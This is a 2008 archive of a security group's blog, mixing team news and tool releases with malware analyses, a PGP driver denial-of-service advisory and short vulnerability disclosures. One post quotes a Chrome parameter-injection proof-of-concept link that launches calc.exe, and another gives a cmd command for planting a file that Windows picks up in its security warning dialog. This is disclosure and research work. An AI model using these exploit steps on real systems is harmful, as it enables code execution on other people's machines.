Wednesday, December 31, 2008

EvilFingers - Global Hacker Initiative [EFGHI]

EvilFingers - Global Hacker Initiative [EFGHI], is an attempt to spread the word, expand and network with great hackers around the globe to unify our effort to help our community, the security community.

Just like the above logo, several groups will strengthen our effort and several hackers will unify our goal.

Do contact us if you would like to start help us in the expansion process. You can email us at contact.fingers @

- EF

2009, with a good start!!!

To give a good start for 2009, Kirk has worked really hard in completing the next version of Process Memory Dumper [PMD]. The tool is complete and is in the testing phase for flawless [or minimal flawed] release.

We wish to ensure that 2009 would be a great start for all our users, hence we will be coming up with other possible releases very soon. If you have any views/ideas for enhancing/modifying our site please do shoot us an email and we will consider all your views. Even if your ideas are not considered for enhancements, we will email you the reason for not considering your idea.

Please feel free to contact us at any point of time at contact.fingers @

- EF

An unfortunate occurrence...

2008 ended with an unfortunate occurrence. We came to know that one of our members have submitted PCAPs that was generated from another tool [we weren't completely sure]. We requested the member to confirm [the member accepted the fact that some of the PCAPs did not belong to him] and resubmit an entire set after removing the PCAPs that could be belonging to some other proprietary software. But the member did not get back with any changes and we never like to take chances. Hence, the entire buffer overflow PCAP section [35 PCAPs] has been discarded and EvilFingers has terminated the membership of this volunteer who is responsible for such an occurrence. Kindly, excuse us for any inconvenience.

If you find any proprietary, copyrighted stuff, corporate espionage or even chances to any kind of fraud, kindly contact us without any hesitation at contact.fingers @

- EF

Hello Readers - Happy New Year 2009!!!

May this occasion bring in happiness, good health and wealth in all your families. May God bless us all. Let us all show some awesomeness in the forth coming year.

On this occasion, within the next week EvilFingers is releasing the next version of Process Memory Dumper(PMD), we have also worked on setting up our malware analysis division and we have some advisories to be released during normal working days, so that we do not ruin the holidays for any human.

Enjoy your vacation and Happy new year once again.

- EF

Tuesday, December 30, 2008

before submitting your work...

Please consider the following before you think of submitting a work for release:

Do not send us stuff that you have published elsewhere, be it open source or closed source for your job, we don't want to get into licensing or corporate espionage.

Example of a misery: One of our volunteers recently did 35 PCAPs in the 3 months of his existence. He spent most of our other volunteers time by chats and emails[about 7 - 10 hrs]. Now he comes to us and tells after further investigation that all 35 weren't his and that some of them were his friends. He is not sure whether it was generated or collected online. Even though we try keeping the name concealed we try sharing the info, since we do not want any such occurrences again.

- EF

Monday, December 29, 2008

Secure Password Generator v1.0 Released!!!

Secure Password Generator[SecurePwdGen] is a password generator that gives the option for the user to choose:

1. The usable set of input char.
2. Length of the password.

Once done, the user would be able to generate multiple strong*** passwords by hitting the "Generate" button. This tool was coded in .Net .


Credits: Kirk McGraw

Let us know your views, reviews and questions. Contact us at contact.fingers @

*** - Strength of the password depends on the input set provided by the user.

This tool could be found at the following link:

- EF

Sunday, December 28, 2008

The "DesktopSmiley, Not A Spyware" ToolBar

The "Not A Phishing Worm" really got me interested as it sent special Christmas messages so I decided to dig in just a bit. So as discovered, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to to download their toolbar. Which they say is "Not Spyware".

So we got a non-phishing worm downloading a non-spyware program, let's see its non-evil actions :)
The first thing I did was downloading the installer, which asks no questions and shows no EULA. It is also digitally signed by "DoubleD Advertising Limited", well that's really funny, we have got to give them that :)

So I ran it in a VM:

That is quite original! "A non-virtualized hardware system is required", of course anybody technical gets how lame this lie is :)
why would an IE toolbar "require" a "non-virtualized hardware", why would it even bother to check if it's running under a virtualized environment unless it has some illegal actions to hide?!

Well i am defiantly not going to execute it on my machine :)
Maby i will test is some other day on a real machine with Restore-IT/Ghost

In the meantime, let's take look at some of the things that it does:
It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ except for (AutoDetect and UNCAsIntranet which exist there and get modified):
ProxyBypass:1 (default 1)
IntranetName:1 (default 1)
MigrateProxy:1 (default 1)
AutoDetect:1 (default 0)
UNCAsIntranet:1 (default 0)
ProxyEnable:0 (default 0)

It sure looks like someone is going to assign a proxy for us :)

The setup process command-line:
"C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe" /new /src=user

the "/src=user" really sounds like there are cases which the user did not initiated the installation :) it could be used for self-update though.

Lets examine some of the the strings in the memory of this "DoubleD" software:
Well, i don't want to point a blaming finger but it seems this "legitimate smiley IE toolbar" is very interested in getting some access to our saved PuTTY SSH hosts...quite innocent

There are a lot of weird stuff this spyware does, like starting a local proxy which explains how they steal data from IE and makes this self-updating software a cool way to make a non-botnet botnet :)
It also implements an SSH client and almost every famous encryption algorithm (rinjdeal, AES, des, 3des, blowfish) looks like it does local MITM attacks to SSH login software.

So get root and Smile away with it :)

The MSN "Not A Phishing Worm"

This is a funny one actually :)
I am just working as usual when I got the following message on my MSN Messenger:
This is how real girls party. Great high quality pictures on
Now of course i understood that it's a worm, but still, lets see where it leads to.
So I went into the site and it looked like this:

With what i have seen until now, this is a classic phising site, I saw dozens
like it for Yahoo! in the past. But wait! lets look at that GREY text blow:

Terms of Use / Privacy Policy:

By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties. By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a "phishing" site that attempts to "trick" you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).


We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort.

T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN's terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

OK, they said in the text:
This is not a "phishing" site that attempts to "trick" you into revealing personal information.
So they don't want our usernames and password, which is also the EMAIL of most people, yeah I believe them, sure.

They just want to:
1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.
Which is completely different with what a worm does. A worm just spreads and "introduces", "entertaining" sites with a lot of porn and exploits.
By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.
Yeah why not, take my account and send spam "on behalf of third parties" and if they get like hacked or something, we are not responsible, you agreed to this.

I believe this should be called "Legal Phishing User Agreement" or "Worm As A Service".
It is also a little wiered that a "legal" domain called "" is dealing with MSN accounts and not PICTURES FROM PARTIES and has unlimited(*.) subdomains and only 1 page, don't you think?!
Ofcourse they used the domain protection:
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Well, don't fill any form you see without reading the small (and in this case GREY) prints :)

The same worm also sends this message:

"[msn_dst_user], claim your Prize!


congratulations [msn_dst_user]!!!


merry XMAS heres your gift


[msn_dst_user], claim your Xmas Card!

[msn_dst_user], see the pics from yesterday's christmas party what do u think?
The messages are updated by the hour, these ones are specific for xmas.
Any file or subdomain in redirects to

Which is also registered by WHOISGuard.
Both these websites were built to make people download this:

Which they claim is:

"Download DesktopSmiley to get 1000's of FREE Smileys!
It's totally FREE! No Registration. No Spyware."

Yes, a toolbar advertised by a WORM is not spyware, sure...
The example above was version 2.0c. It seems these guys used different methods and different domains and different company names in the older versions (which is typical to viruses and spyware but not to legitimate software).
The following example belongs to an older version 1.1c whi MSN message:

Which prompts a download for "" which is an EXE file with a COM extension and where ran "True Type Detection" will be made by windows loader and it will execute as the regular EXE file it is.
Those people don't care a bit and they left "Directory Browsing" open in the subdomain's root, check it out at:
They even forgot to remove their private packer from the site:

They also have a version at: (which i think just went down...)
Which loads "" and "" and VERIFYS the request's REFERER is "" so direct reference to these files returns "404 Not Found".

Blue Screen of Death - is still alive?

Blue screen of death still rules...

- EF

RIP CastleCops

We felt really sorry when we saw the announcement at CastleCops website.


Greetings Folks,

You have arrived at the CastleCops website, which is currently offline. It has been our pleasure to investigate online crime and volunteer with our virtual family to assist with your computer needs and make the Internet a safer place. Unfortunately, all things come to an end. Keep up the good fight folks, for the spirit of this community lies within each of us. We are empowered to improve the safety and security of the Internet in our own way. Let us feel blessed for the impact we made and the relationships created.

With respect to the server marathon, by March 17 2009 CastleCops will refund contributions made through PayPal that were specifically designated for servers. Unfortunately, server donations made via check cannot be returned because we do not have the addresses for the donating entity. Unless instructed otherwise, CastleCops will re-allocate these funds as a donation to the Internet Systems Consortium ( This organization sponsored our hosting environment for approximately the past 2 years. Please contact us [cc at laudanski dot com] before March 17, 2009, if you would like a return of your server marathon donation. Otherwise, we would like to thank the ISC for their unfettered support.

We thank everyone in creating our unique footprint and memories in time.

Love, Best Wishes and Happy Holidays, CastleCops
PST 23 Dec 2008

***********END OF SNIPPET***********

We indeed feel sad for such a great security open community closing all of a sudden. We wish to help with whatever we can, to bring them back up. Let us know, how we could be of help.

- EF

Please consider this before you email us for volunteering

We have done this drill before. We would like to try it out once again.

We receive emails such as "I would like to volunteer." or "I would like to enter your team.". It is going to be a time consuming process for you as well as us.

Just FYI, everything that comes to us remains confidential. Anything you wish to reveal will be the only detail that will be revealed.

From here on, we would like emails that tells us the following:

(1) Who you are?
(2) What you do?
(3) What can you do other than what you do?
(4) Why would you like to volunteer?
(4.a) What you would like to do for us?
(4.b) What would you like to learn from us?
(5) Your skills that you could use for the site ***Autonomously***?

At the current stage we are a DEVELOPING or UNDER DEVELOPED site, hence we invite volunteers with only PRIOR experience in the field or stuff that they wish to volunteer. We expect that the volunteer would be able to handle the tasks that they are assigned to, AUTONOMOUSLY.

Over the time period of few months to few days, depending on contribution status volunteers would be introduced to other volunteers and teams in the site to continue the process of learning and sharing knowledge, which is when you would be able to learn a set of new skills from others in the team.

We thought of doing this drill once again, because we receive many emails these days with volunteering intent (which is great), but the handshake part has grown over 3way handshake due to the following:

1. Lack of information in emails and chats.
2. Delay in emails and chats, which starts the handshake once again due to session termination.
3. Emails saying that someone wishes to volunteer in a section that you don't know nada/null about. Because it is going to take more time for us to explain why we don't do that at the moment.

We received some emails lately asking for us to train people in a specific field and then expect their volunteering. It is definitely a good process, but since we are still at our infant stage, we are unable to appreciate this process. We would instead give it a delay for now and once we are seeing contribution from you at some point of time, we would help you in your learning process.

Do let us know if you have any views or comments on this. We appreciate all inputs and we respond to every single email that we receive. Since, we are also not doing this for full-time basis and since everything is done for contribution and passion, we are in the same boat as you are.

We thank all our current and past volunteers and we wish them success in their life and careers.

Emails are welcome at contact.fingers @ [GMAIL rocks!!!]

- EF

Malware Analysis team

We are opening up malware analysis team. Giuseppe Bonfa will be our Channel manager for this team and we are working on bringing in more volunteers for this team. Rajdeep is joining this team as a malware analyst for now and later would be moving to driver programming. If you are interested in joining this team, and if you have ***PRIOR EXPERIENCE*** in malware analysis in doing work ****AUTONOMOUSLY****, development of tools, etc. that could be beneficial for a team work, please do contact us at Contact.Fingers @

- EF

Saturday, December 27, 2008

Giuseppe 'Evilcry' Bonfa - Italian EvilFingers Team

Giuseppe 'Evilcry' Bonfa is our team lead for our brand new Italian EvilFingers team. nectarGrid project was started in the team with hopes on one of our team members in the past, who has given up a while ago. Hence, Giuseppe would be taking his position and running our Italian team soon.

- EF

Friday, December 26, 2008

PGP Desktop PGPwded.sys (2)

PGP Desktop PGPwded.sys Driver Denial of Service Vulnerabilty discovered some day ago has been confirmed also in version 9.9.0 build 397.

Google Chrome Browser (ChromeHTML://) remote parameter injection POC - Source:

RetroGod Rocks!!!

Author: Nine:Situations:Group

< ! - -
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
tested against: Internet Explorer 8 beta 2, Google Chrome, Microsoft Windows XP SP3
List of command line switches:
Original url:

click the following link with IE while monitoring with procmon
- - >
< a href='"%20--renderer-path="c: \ windows\ syste m32\calc .ex e"% 20--"'>click me< / a >

# [2008-12-23]

Thursday, December 25, 2008

Big Brands XSS

Apple Store - XSS

American Express - HTTPS XSS

How can us customers trust the big brand companies when our accounts are compromised and we can no longer trust links to those empires websites?!

Disclaimer: Knowledge is free. Security is the core. This publication is for knowledge ONLY. Rafel Ivgi or is not responsible for any vulnerabilities listed in this page. Kindly, read the legal section before any second thoughts.

Our Worms & Exploits blog made the news for "An SQL Server Zero-Day Exploit In Time For Christmas"

Security Pro News guys have release a news on the topic "An SQL Server Zero-Day Exploit In Time For Christmas". Here is the news on Worms&Exploits Blog.

*****NEWS SNIPPET*****

Worms and Exploits doesn't make it sound all that difficult though:

"This could be exploited by sending a payload with specially crafted values which could result in a memory corruption, and then this could be exploited to execute arbitrary code with the privileges of the current user. But authentication is required to exploit this vulnerability, it is also exploitable via SQL injection, by using the authentication credentials of the vulnerable web application. A proof-of-concept is already been publicly available at places for this vulnerability."

The author offers some workarounds, though.

Microsoft offers this reassurance as well: "…due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack."

*****SNIPPET ENDS*****

Contact us for anything & everything.

- EF

Welcome Rajdeep Chakraborty [] !!!

Rajdeep Chakraborty is our new team member of the malware analysis team. To start with his contribution, he has released a subnet calculator. He will now be working on anti-Rootkits team and Process management team.

Rajdeep Chakraborty can be contacted at rajdeep.chakraborty @ and we can be reached at contact.fingers @

- EF

Wednesday, December 24, 2008

SO Common and yet EVIL goes free :)

Before I start this one, I must say I never thought of myself as a blogger.
I was always reading other people's blog thinking they try to be "I am cool I have a blog" kind of people. Well, I just think the malicious stuff I see everyday should be shared with YOU :)

At these times, torrents are currently the world's most active network for file sharing. The current windows version is always One of the most shared files and therefore crime follows there :)

I recently decided to put it to the test and downloade the most "seeded" file I found, which was "Windows XP Pro.Corp. Edition SP3 June 2008 Update + SATA Driver", this is still one of the most shared files. Of course I scanned it using the latest fully updated version of Kaspersky 2009 and Dr.Web which according to my test, are currently the best detectors on the market. Well, nothing was found...

So I load the iso, the AutoRun executes and I just "feel" something is wrong!! I look at Process Explorer and I see a process called "file.exe"...hmmmmm....
I figured out that the bad guys replaced the original "setup.exe" with a silent self extract WinRar installation with the original setup icon, it extracts a Trojan Downloader called file.exe and the original setup.exe to the temp directory and executes both the Trojan and the original setup (with CurrentDirectory as the winrar install path).

Here is a scan of the malicious "setup.exe" (today, 2 month after I found this) installer:

I said O.K maby they didn't go through the trouble marking the "Installer", but they did all detect the Trojan Downloader, right?

Well, they didn't :)
This is really funny to see that all you need to be "a top notch" malicious software is to just download WinRar and NIST (NullSoft Installation System) and create a windows xp sp3 installation torrent, this is after 20 years of Anti-Virus security techonology by 7 billion dollar a year market.

More funny stuff! the author of this virus was so lazy he just put a list the relative path to the real setup executable of all the software he will infect and share in the internet so the "setup.exe" he made will now try to execute a list of files which only one should exist on your infected download :)
Some Examples:

Be aware of what you download! it seems the best way to tell if its an infected setup is to right click setup.exe and see if WinRar suggests "Extract To" (I am joking of course)

The executed "file.exe" downloaded which is also a NIST file and also a Trojan Downloader and my upload was the first time it was scanned in virustotal and you can guess the results:

Whats really annoying me in this result is that the 3-4 Anti-Viruses that "supply a solution" above and detect the downloader DOES NOT DETECT THE CONSTANT FILE IT DOWNLOADS which means all the malware creator needs to do is modify the downloader or use a new one and there he goes again infecting the entire planet and getting away with it!

Now "3913574.exe" downloaded
Which is not packed by a known packer and even isn't identified as having a "packed entropy" by PEiD. Its a small application compiled by ms vc++ 7/8, 72kb.
Its import table it quite limited and it calls GetProcAddress to get:
SetProcessPriorityBoost, WriteFile, GetEnvironmentVariableA, InternetOpenA, ExitProcess, GetTempPathA, InternetCloseHandle, CloseHandle, TerminateProcess, CreateFileA, DeleteFileA,SHChangeNotify, lstrcpyA, lstrcpyn, InternetGetConnectedState, GetAdaptersInfo
SetThreadPriority, GetModuleFileNameA, Sleep, ShellExecuteEx, InternetOpenUrlA

Of course the strings are not plaintext and its also not XOR, how refreshing!!! its a nice code that identified a header byte and multiples the bytes with a word per this header, may be it is some kind of little compression.

Now more then 10 executables are downloaded into your system, some are detected by some AV's and some are not, they are packed with Armadillo v1.71 and some with ASPack v2.12

These executables are saved in:

  • MicroAV.exe


  • 1.exe, 2.exe, 3.exe, 4.exe, 5.exe, 7.exe

and of course to %windir%\system32

  • MicroAV.cpl, apgambly.dll, biqwetjd.dll and three dlls with names of a 8 random [a-zA-Z0-9] string
About 5-6 entries are added to registry->Run to load the processes that bug you in the system tray. This home made looking trojan is much more advanced then it appears to be...
Clearly these evil guys are advancing and they don't stop at loading from registry->Run
they start using advanced loading methods such as registering as Authentication Packages to be loaded inside LSA and as logon notification dlls to be loaded inside winlogon.exe(which is one of the best places to be in since it cannot be terminated)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\yayxuSIb]

"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,43,\

Other official releases of "PGP Desktop 'PGPweded.sys' Local Denial of Service Vulnerability"

Thanks to Media.
- EF

Mountassif Moad - Our Moroccan POC

Mountassif Moad aka. Stack is our vulnerability analyst. He is now running EvilFingers Moroccan team and is our new blogger. Mountassif Moad, will be blogging in Moroccan and French.

If you have any questions contact us at contact.fingers @

- EF

Tuesday, December 23, 2008

Milw0rm & Securiteam has just confirmed on the release

Contact us for any questions : contact.fingers@

- EF

PGP Desktop 9.0.6 Denial Of Service - ZeroDay

PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected:
PGP Desktop 9.0.6 [Build 6060] (other version could be affected)

Component Affected:

Release Date:
Release Date. 23 December ,2008

PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD. Affected IOCTL is 0x80022038.

Click Here

Giuseppe 'Evilcry' Bonfa' (Team Lead, /

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.


Contact us for any questions @: contact.fingers @

Why do we use Gmail? Because Google rocks, and GMAIL is definitely a good stuff from the very beginning.

- EF

Monday, December 22, 2008

Windows "Open File - Security Warning" Dialog

Not so long ago, I found one of the most bizzare bugs. It seems there is some kind of bug in the parsing of the command line read from the registry for filetype handled by explorer.exe. This was checked on Windows XP SP3 but I guess it existst in SP2 too. This bug allows controling the icon which appears in the "Open File - Security Warning" Dialog for all the executables downloaded from the internet.

Each time you download a file from the internet/intranet to a drive with NTFS file system an ADS (Alternate Data Stream) ini file which is called "Zone.Identifier" is created. This hidden ini file specifies the zone file came from, this can be the internet or the local network (intranet).

You can see it using the following in cmd:
more < exe_from_internet.exe:Zone.Identifier
The ini will be printed to the screen:

When you "click" (shellexecute) a file which his handler is explorer.exe then the Zone.Identifier is checked and if the zone is 3 (internet) the following screen appears:

Well it appears that each time you try to open an executable that came from the internet, the icon that will apear in this dialog will be parsed from an executable file called ".exe" or "%1" in any directory of the "PATH" environment variable for the user running explorer.exe, for example:


you can create such a file using "cmd /c type c:\windows\system32\calc.exe > c:\windows\.exe"
or write a code to use CreateFile :)

The file request is FASTIO_NETWORK_QUERY_OPEN and the icon is cached in memory until explorer.exe process is terminated. If you want to further explore this case, here is the call stack:

Welcome Rafel Ivgi aka The-Insider!!!

Rafel Ivgi is a CTO/Chief Architect at Aspect9 Security, Israel. He is also author of several websites:

Rafel will be managing our Israel division of EvilFingers along with its content and projects. All/most of the projects will also be shared with his blogs and with SecuriTeam site.

Contact us @ contact.fingers @ if you wish to become a translator for any language. We will work out a plan for you.

- EF

Sunday, December 21, 2008

Three undersea cables cut: traffic disturbed between Europe and Asia

This is not usual with ZDNET ZeroDay blog. Is something wrong with my internet connection.

December 17th, 2008
Thousands of legitimate sites SQL injected to serve IE exploit
Posted by Dancho Danchev @ 1:19 pm

The above is the last posting for ZDNET ZeroDay blog and it is NOT normal.

On further checking the news, one of our friends found this news at the following link:, which did not make the headlines at many other news channels for some reason sounds like a coincidence.


*********************BEGINNING OF NEWS****************************

Dec 19, 2008
Three undersea cables cut: traffic disturbed between Europe and Asia

3 cables cut this morning (Sea Me We3 partly + Sea Me We4 + FLAG)France Telecom Marine cable ship about to depart

PARIS — France Telecom observed today that 3 major underwater cables were cut: “Sea Me We 4” at 7:28am, “Sea Me We3” at 7:33am and FLAG at 8:06am. The causes of the cut, which is located in the Mediterranean between Sicily and Tunisia, on sections linking Sicily to Egypt, remain unclear.

Most of the B to B traffic between Europe and Asia is rerouted through the USA. Traffic from Europe to Algeria and Tunisia is not affected, but traffic from Europe to the Near East and Asia is interrupted to a greater or lesser extent (see country list below).

Part of the internet traffic towards Réunion is affected as well as 50% towards Jordan. A first appraisal at 7:44 am UTC gave an estimate of the following impact on the voice traffic (in percentage of out of service capacity):

* Saudi Arabia: 55% out of service
* Djibouti: 71% out of service
* Egypt: 52% out of service
* United Arab Emirates: 68% out of service
* India: 82% out of service
* Lebanon: 16% out of service
* Malaysia: 42% out of service
* Maldives: 100% out of service
* Pakistan: 51% out of service
* Qatar: 73% out of service
* Syria: 36% out of service
* Taiwan: 39% out of service
* Yemen: 38% out of service
* Zambia: 62% out of service

France Telecom immediately alerted one of the two maintenance boats based in the Mediterranean area, the “Raymond Croze”. This France Telecom Marine cable ship based at Seyne-sur-Mer has received its mobilization order early this afternoon and will cast off tonight at 3:00 am with 20 kilometers spare cable on board. It should be on location on Monday morning for a relief mission.

Priority will be given to the recovery of the Sea Me We4 cable, then on the Sea Me We3.

By December 25th, Sea Me We4 could be operating. By December 31st, the situation should be back to normal.

Source: France Telecom

*********************END OF NEWS*************************

Do send us stuff if you wish to post something here, or if you wish to become our blog writer, developer or do anything that you would like doing, but haven't been given a chance in the outside world.

- EF

.:: Backdoor.Win32.UltimateDefender.gtz - Reversing::.

Abstract : install.exe presents the typical structure of an Medium Evoluted Malware, with basical Obfuscated-Dummy Code, some layer of Encryption decoded at Runtime and Custom Hash Functions used as Integrity Check. We can also see an intersting technique that retrieves API's Addresses OnDemand through a series of hardcoded values that corresponds to some API, the correspondent API Address is computated at runtime and chosen in function of the Hardcoded Value.

Credits : Giuseppe Bonfa

Link to the publication : Backdoor-UltimateDefender.pdf

Links to publication section(s) :



If you wish to publish your research, articles, journal, books, or anything that is related to the community, do contact us at contact.fingers @

- EF

Friday, December 19, 2008

Honeypot SMTP Server is giving a FREE download of this tool based on *CUSTOM REQUEST* once it is ready to release after Quality analysis, code analysis, stress analysis, etc.

Though, this time we would prefer a mutual agreement with whoever wants this tool for giving us the logs for analysis. This would also help them receive any alerts or analysis results that we obtain from the inputs you submit. We are working on a tool to automate this process too.

If you have any further questions do feel free to contact us at contact.fingers @

Credits to Honeypot SMTP Server goes to Jack O'Neill

- EF

Thursday, December 18, 2008

Fraud, Crime, Layoff's and Poverty

How are they proportional?

When Economy shatter's like right now, what are its cause and effect.

Cause: Few rich guys did not care about "Conditions" that were applied when lending to the smaller guys.
Effect: Bailout - Simple right.

Cause: Economy goes down.
Effect: Stocks go down, industries lacking sponsors and money, investment banking has entered the dark world.

Cause: Industries not doing well.
Effect: Random lottery of Layoff and random firing of employees.

Cause: Joblessness
Effect: Search for jobs, cut down standard of living (which some people don't think of), more time to think.

Cause: More time, joblessness and irritation of searching for jobs.
Effect: People tend to think about alternate source of income.

Cause: Alternate sources of income.
Effect: Shortcuts to earn money, Fraud and Crime.

Cause: Increase in Fraud & Crime.
Effect: Economy goes down steeper.

Isn't that a never ending circle. Where does it all begin? Well, you all know where it begins, but that is not what is important. The important question to answer is "When does this end with happy endings?"

- EF

Wednesday, December 17, 2008

Microsoft Security Bulletin MS08-078 - Critical

Official release can be found at, part of which is listed below:

Microsoft Security Bulletin MS08-078 - Critical
Security Update for Internet Explorer (960714)
Published: December 17, 2008

Version: 1.0
General Information
Executive Summary

This security update resolves a publicly disclosed vulnerability. The vulnerability could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This security update is rated Critical for Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, and Internet Explorer 7. For information about Internet Explorer 8 Beta 2, please see the section, Frequently Asked Questions (FAQ) Related to This Security Update. For more information, see the subsection, Affected and Non-Affected Software, in this section.

The security update addresses the vulnerability by modifying the way Internet Explorer validates data binding parameters and handles the error resulting in the exploitable condition. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information.

This security update also addresses the vulnerability first described in Microsoft Security Advisory 961051.

Recommendation. Microsoft recommends that customers apply the update immediately.

Known Issues. None

This is based on the vulnerability released in the following page (

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
Published: December 10, 2008 | Updated: December 17, 2008

Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078 to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844.


You can provide feedback by completing the form by visiting Microsoft Help and Support: Contact Us.

Customers in the United States and Canada can receive technical support from Microsoft Product Support Services. For more information about available support options, see Microsoft Help and Support.

International customers can receive support from their local Microsoft subsidiaries. For more information about how to contact Microsoft for international support issues, visit International Support.

Microsoft TechNet Security provides additional information about security in Microsoft products.


The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.


December 10, 2008: Advisory published

December 11, 2008: Revised to include Microsoft Internet Explorer 5.01 Service Pack 4, Internet Explorer 6 Service Pack 1, Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 as potentially vulnerable software. Also added more workarounds.

December 12, 2008: Revised to correct operating systems that support Windows Internet Explorer 8 Beta 2. Also added more workarounds and a reference to Microsoft Security Advisory (954462).

December 13, 2008: Revised to add the workaround, Disable XML Island functionality. Also, in a FAQ entry, clarified the list of recommended workarounds and added the blog post URL for recommended workarounds.

December 15, 2008: Updated the workarounds, DisableXMLIsland functionality and Disable Row Position functionality of OLEDB32.dll.

December 17, 2008: Advisory updated to reflect publication of security bulletin.

NOTE: All of the above are from the ***OFFICIAL*** Microsoft Security bulletin. has given a really good description on the "Microsoft Security Advisory: Vulnerability in Internet Explorer could allow remote code execution".

- EF

SPAM & Phishing Detection Framework is now working on setting up a SPAM and Phishing Detection framework. We will be releasing our architecture soon, which will follow by the entire release of this framework.

If you think that you could help us, or if you wish to volunteer by any other means contact us at contact.fingers @

- EF

Tuesday, December 16, 2008 & are now Partners

We welcome our new research partner, for our extended partnership in malware analysis and more. Check out their tool on malware analysis, Advance Malware Identification & Removal (AMIR):

" Advance Malware Identification & Removal is an application that will help you to quickly identify any unwanted process (except RootKit) running in your system. Also it will give you the option to remove them easily. Once AMIR runs in the system, it will highlight (with color) the possible suspect programs and also give you a lot of other relevant information about the process. It shows you PE Details, actual Memory Dumps of the running process and also the various Resources used by the binary. It even has a Heuristic Scanner that can sniff out Malicious code from .vbs, .inf, .bat files. AMIR can also enable Regedit, Task Manager & Folder Option that has been locked by Malware activity. Armed with numerous state of art options, it becomes very easy to detect any kind of Malware (except RootKit) running in the system. "

If you have any questions on partnership, feel free to contact us at contact.fingers @

- EF

Monday, December 15, 2008

Threat Analysis Framework/ ThreatDB Architecture

Threat - Defining threat depends on what you are looking for and who you are. Threat is something that could stop or obstruct ones functioning or working. In other words, anything that could potentially obstruct, destruct or destroy someone or something. Well, this is not a good definition, though our plan here is not to discuss on the semantics. We are planning to work on a project to unify all our good resources for the security community [intrusion defense to start with] around the world to make use of in the process of their engineering and analysis. To start this effort, we have contacted NVD, EmergingThreats and milw0rm to use their resources to make this project happen.

Threat Analysis: Architecture

Vulnerabilities, exploits and general traffic is used for producing signatures and PCAPs. Once this is done, we would map all this into one utility to produce the threat analysis page. The backend for mapping all this data is our threatDB.

Apart from using EmergingThreats signatures, we would also be generating our own. To start with this Initiative, we would have PCAPsDB, VulnDB and ExploitDB mapping to each other and then SigDB to map with them. We already have initiated the process of generating PCAPs. We now have around 800+ PCAPs of Malicious data. We are releasing the Browser Exploit PCAPs from milw0rm listings in our next release.

We have a talked to all of the sites listed above. EmergingThreats reserves copyrights for its signatures and, milw0rm reserves copyrights for their exploits.

All questions and comments are most welcome. If you have any other questions or if you wish to participate in any of our projects, kindly contact us at contact.fingers {at}

- EF

Sunday, December 14, 2008

Threat Analysis Framework

We are working on threat analysis framework for our Projects section. We are looking for PHP developers and Perl/Python/Ruby script writers for immediate filling.

The developer who we are looking for will have few yrs experience in developing websites using PHP. Should have experience with XML/XSLT parsers and backend too.

Contact us immediately if you have any questions relating to this position at contact.fingers @

- EF

Saturday, December 13, 2008

The Academy Pro is our new Publicity Partner

